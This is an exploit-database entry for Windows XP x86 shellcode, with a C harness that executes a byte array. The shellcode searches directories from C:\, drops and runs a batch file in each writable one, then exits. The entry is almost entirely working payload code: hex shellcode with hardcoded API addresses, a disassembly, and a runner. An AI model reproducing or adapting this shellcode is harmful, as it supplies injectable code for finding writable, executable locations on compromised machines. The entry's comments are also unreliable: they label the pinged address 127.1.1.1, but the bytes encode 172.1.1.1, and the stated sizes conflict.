# Title: Windows x86 - Executable directory search Shellcode (130 bytes) # Date: 26-02-2017 # Author: Krzysztof Przybylski # Platform: Win_x86 # Tested on: WinXP SP1 # Shellcode Size: 130 bytes /* Description: write & exec dir searcher starts from C:\ If dir found then write, execute (ping 127.1.1.1) and exit If Write/noexec dir found then continue Tested on WinXP SP1 (77e6fd35;77e798fd) i686-w64-mingw32-gcc shell.c -o golddgger.exe Null-free version: (gdb) disassemble Dump of assembler code for function function: => 0x08048062 <+0>: pop ecx 0x08048063 <+1>: xor eax,eax 0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al 0x08048068 <+6>: push eax 0x08048069 <+7>: push ecx 0x0804806a <+8>: mov eax,0x77e6fd35 0x0804806f <+13>: call eax 0x08048071 <+15>: xor eax,eax 0x08048073 <+17>: push eax 0x08048074 <+18>: mov eax,0x77e798fd 0x08048079 <+23>: call eax NULL-free shellcode (132 bytes): "\xeb\x19\x59\x31\xc0\x88\x41\x64" "\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe2\xff\xff\xff" "\x63\x6d\x64\x2e\x65\x78\x65\x20" "\x2f\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52" "\x20\x2f\x44\x20\x2f\x72\x20\x25" "\x41\x20\x49\x4e\x20\x28\x2a\x29" "\x20\x44\x4f\x20" "\x65\x63\x68\x6f\x20" "\x70\x69\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41\x5c\x7a\x2e\x62" "\x61\x74\x22\x26\x28\x63\x61\x6c" "\x6c\x20\x22\x25\x41\x5c\x7a\x2e" "\x62\x61\x74\x22\x26\x26\x65\x78" "\x69\x74\x29\x29\x22"; */ // NULL version (130 bytes): char code[] = "\xeb\x16\x59\x31\xc0\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe5\xff\xff\xff\x63" "\x6d\x64\x2e\x65\x78\x65\x20\x2f" "\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52\x20\x2f\x44" "\x20\x2f\x72\x20\x25\x41\x20\x49" "\x4e\x20\x28\x2a\x29\x20\x44\x4f" "\x20\x65\x63\x68\x6f\x20\x70\x69" "\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41" "\x5c\x7a\x2e\x62\x61\x74\x22\x26" "\x28\x63\x61\x6c\x6c\x20\x22\x25" "\x41\x5c\x7a\x2e\x62\x61\x74\x22" "\x26\x26\x65\x78\x69\x74\x29\x29" "\x22\x00"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-28]